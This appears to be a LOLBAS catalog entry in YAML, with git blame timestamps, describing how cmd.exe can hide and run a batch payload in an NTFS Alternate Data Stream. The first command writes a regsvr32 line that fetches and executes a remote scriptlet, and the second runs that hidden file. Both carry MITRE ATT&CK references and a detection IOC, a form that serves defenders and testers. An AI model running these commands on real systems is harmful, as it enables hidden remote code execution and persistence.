LOLBAS/yml/OSBinaries/Cmd.yml

36 lines
1.4 KiB
YAML
Raw Normal View History

2019-06-27 13:40:03 +02:00
---
2019-06-26 12:33:11 +02:00
Name: Cmd.exe
Description: The command-line interpreter in Windows
Author: 'Ye Yint Min Thu Htut'
Created: 2019-06-26
2019-06-26 12:33:11 +02:00
Commands:
- Command: cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct ^scrobj.dll > fakefile.doc:payload.bat
2019-06-27 13:40:03 +02:00
Description: Add content to an Alternate Data Stream (ADS).
Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism
Category: ADS
Privileges: User
MitreID: T1170
MitreLink: https://attack.mitre.org/wiki/Technique/T1170
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: cmd.exe - < fakefile.doc:payload.bat
Description: Execute payload.bat stored in an Alternate Data Stream (ADS).
2019-06-26 12:33:11 +02:00
Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism
Category: ADS
Privileges: User
2019-06-27 13:40:03 +02:00
MitreID: T1170
MitreLink: https://attack.mitre.org/wiki/Technique/T1170
2019-06-26 12:33:11 +02:00
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full_Path:
- Path: C:\Windows\System32\cmd.exe
- Path: C:\Windows\SysWOW64\cmd.exe
Code_Sample:
2019-06-26 12:33:11 +02:00
- Code:
Detection:
- IOC: cmd.exe executing files from alternate data streams.
Resources:
- Link: https://twitter.com/yeyint_mth/status/1143824979139579904
Acknowledgement:
- Person: r0lan
Handle: '@yeyint_mth'
---